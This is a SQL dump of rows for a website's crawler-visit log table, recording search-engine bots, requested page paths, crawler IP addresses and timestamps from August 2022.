INSERT INTO `ey_weapp_spider_visit` VALUES ('95984', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/412.html', '114.119.151.155', '1661131527', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96030', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.108', '1661154488', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95999', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '//index.php?m=vod-search', '209.141.57.123', '1661139268', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95971', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/blj/list_12_2/', '185.191.171.43', '1661123129', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96320', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/497.html', '66.249.79.108', '1661252197', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96321', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.116', '1661252219', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96322', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661252222', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95867', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/62.html', '185.191.171.20', '1661064711', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95869', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '1.14.48.115', '1661065360', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95870', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_36/', '114.119.151.155', '1661067188', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95860', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/57.html', '66.249.79.108', '1661061659', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95861', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/466.html', '66.249.79.110', '1661061894', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96333', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/308.html', '66.249.79.108', '1661255614', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96334', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/yqal/', '185.191.171.5', '1661256010', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96335', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.144', '1661257016', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96336', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/271.html', '114.119.151.153', '1661258574', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96337', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/70_3.html', '185.191.171.4', '1661260269', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96338', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/496.html', '185.191.171.8', '1661260441', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96339', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/list_2_3/', '185.191.171.9', '1661260616', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96340', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/1_32.html', '66.249.79.108', '1661260712', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96341', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/bijie.html', '114.119.151.155', '1661261812', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96342', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/373.html', '114.119.151.155', '1661262608', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96343', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/110.html', '114.119.151.153', '1661263189', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95854', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/41.html', '185.191.171.37', '1661058949', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95855', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_23/', '185.191.171.3', '1661059737', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95856', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/77.html', '185.191.171.16', '1661059863', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95857', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661060416', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96348', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/65.html', '114.119.151.155', '1661266303', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96349', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/liaoyang.html', '114.119.151.153', '1661266404', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95868', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/72.html', '114.119.151.155', '1661064780', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95853', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31.html', '185.191.171.39', '1661058911', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95843', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/492.html', '66.249.79.112', '1661055226', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95847', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/492.html', '66.249.79.108', '1661057004', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95844', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/461.html', '185.191.171.39', '1661055459', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95841', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2.html?tagid=2', '185.191.171.42', '1661053905', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95835', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/88.html', '66.249.79.112', '1661048521', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95826', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_7.html', '185.191.171.5', '1661037239', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95811', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/99.html', '114.119.151.155', '1661028368', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95814', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/301.html', '114.119.151.153', '1661030634', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95810', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/359.html', '114.119.151.153', '1661027479', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95805', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25.html', '185.191.171.10', '1661020515', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95808', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/60_2.html', '185.191.171.38', '1661026612', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95812', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/qzs.html', '114.119.151.155', '1661029250', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95799', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/59.html', '66.249.79.108', '1661017523', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95827', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.6', '1661037814', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95825', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/410.html', '66.249.79.112', '1661037111', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96164', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_60/', '185.191.171.4', '1661215835', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96161', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/32.html', '185.191.171.33', '1661214248', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96162', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/case/58.html', '216.244.66.194', '1661214670', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96167', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '23.231.76.242', '1661217073', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96168', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '23.231.76.242', '1661217074', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96160', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.129.237.144', '1661214079', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96157', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.81', '1661211924', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96144', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/374.html', '114.119.151.155', '1661205019', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96267', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/52.html', '185.191.171.44', '1661234183', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96142', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tulufan.html', '114.119.151.155', '1661204681', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96268', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/248.html', '66.249.79.110', '1661234446', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96269', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/163.html', '114.119.151.155', '1661234825', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96271', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/391.html', '114.119.151.153', '1661235250', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96202', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/384.html', '162.55.86.60', '1661218270', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96199', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/375.html', '162.55.86.60', '1661218247', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96201', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/380.html', '162.55.86.60', '1661218264', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96243', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/487.html', '58.250.125.99', '1661223064', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96205', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/403.html', '162.55.86.60', '1661218292', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96211', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/496.html', '162.55.86.60', '1661218326', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96244', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/158.html', '116.179.32.114', '1661223739', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96196', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/369.html', '162.55.86.60', '1661218232', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96245', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661224820', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96197', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/371.html', '162.55.86.60', '1661218237', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96246', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/52_3.html', '185.191.171.4', '1661225300', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96192', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/280.html', '162.55.86.60', '1661218209', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96231', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/tb/', '162.55.86.60', '1661218484', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96236', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/64.html', '66.249.79.112', '1661219198', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96191', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/266.html', '162.55.86.60', '1661218204', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96189', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/message/', '162.55.86.60', '1661218192', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96187', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/jbzxw/', '162.55.86.60', '1661218176', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96190', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/', '162.55.86.60', '1661218199', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96380', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/20.html', '220.181.108.81', '1661283790', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96180', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/chukouquanqiu/', '162.55.86.60', '1661218125', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96179', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/', '162.55.86.60', '1661218121', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96178', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/buliaoji/', '162.55.86.60', '1661218117', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96183', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/gongsijianjie/', '162.55.86.60', '1661218147', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96251', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25.html', '185.191.171.1', '1661227021', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96252', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/honor/', '114.119.151.153', '1661228065', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96181', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/contact/', '162.55.86.60', '1661218128', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96182', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/gjxw/', '162.55.86.60', '1661218139', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96176', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/', '162.55.86.60', '1661218101', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96177', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/', '162.55.86.60', '1661218106', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96188', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/jiaruwomen/', '162.55.86.60', '1661218185', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95788', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/185.html', '220.181.108.149', '1661004959', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96360', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_3.html', '185.191.171.9', '1661273178', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95785', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/101_6.html', '185.191.171.23', '1661004248', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95781', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/353.html', '114.119.151.155', '1661003008', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95783', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/433.html', '114.119.151.153', '1661003234', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95780', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/hangyexinwen/list_18_25/', '114.119.151.155', '1661002591', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95782', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/weinan.html', '114.119.151.155', '1661003111', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95775', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/list_2_3/', '114.119.151.155', '1661001318', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95773', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/184.html', '114.119.151.153', '1661000930', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95768', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/221.html', '185.191.171.3', '1660999517', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95761', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/446.html', '185.191.171.4', '1660988858', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95801', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/chezaibengal/', '185.191.171.33', '1661018052', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95807', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/384.html', '207.46.13.9', '1661025767', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95800', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/305.html', '185.191.171.4', '1661017634', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95817', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661032040', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95767', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/361.html', '185.191.171.40', '1660999109', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96550', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.110', '1661359968', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96264', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/104.html', '114.119.151.155', '1661232595', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96238', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661220586', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96232', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/tbxw/', '162.55.86.60', '1661218492', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96233', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/tuobeng/', '162.55.86.60', '1661218503', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96234', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/yqal/', '162.55.86.60', '1661218512', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96230', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/86.html', '162.55.86.60', '1661218477', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96229', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/82.html', '162.55.86.60', '1661218473', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96226', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/70.html', '162.55.86.60', '1661218443', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96225', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/69.html', '162.55.86.60', '1661218438', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96224', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/368.html', '162.55.86.60', '1661218427', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95778', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/', '114.119.151.155', '1661001973', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95786', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/222.html', '114.119.151.155', '1661004249', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95787', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661004378', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95779', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/107.html', '114.119.151.153', '1661002359', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95784', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/13_2.html', '185.191.171.40', '1661004031', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95776', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tr.html', '114.119.151.153', '1661001416', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95772', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_61/', '114.119.151.155', '1661000836', '0');
